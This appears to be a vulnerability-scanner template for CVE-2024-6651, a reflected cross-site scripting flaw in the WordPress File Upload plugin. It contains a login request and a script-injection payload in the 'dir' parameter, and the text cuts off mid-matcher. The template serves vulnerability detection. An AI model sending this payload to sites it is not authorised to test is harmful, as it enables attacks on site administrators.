id: CVE-2024-6651 info: name: WordPress File Upload Plugin < 4.24.8 - Cross-Site Scripting author: ritikchaddha severity: high description: | The WordPress File Upload plugin before version 4.24.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'dir' parameter in the file browser page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. reference: - https://wpscan.com/vulnerability/65e2c77d-09bd-4a44-81d9-d7a5db0e0f84 - https://nvd.nist.gov/vuln/detail/CVE-2024-6651 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N cvss-score: 7.1 cve-id: CVE-2024-6651 cwe-id: CWE-79 metadata: max-request: 3 vendor: WordPress product: wp-file-upload fofa-query: body='wp-content/plugins/wp-file-upload/' tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wp-file-upload,authenticated flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} redirects: true matchers: - type: word part: body words: - 'wp-file-upload/' internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/options-general.php?page=wordpress_file_upload&action=file_browser&dir=7b2BEyT8ArR1jaD9%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctest%20test%3D HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '">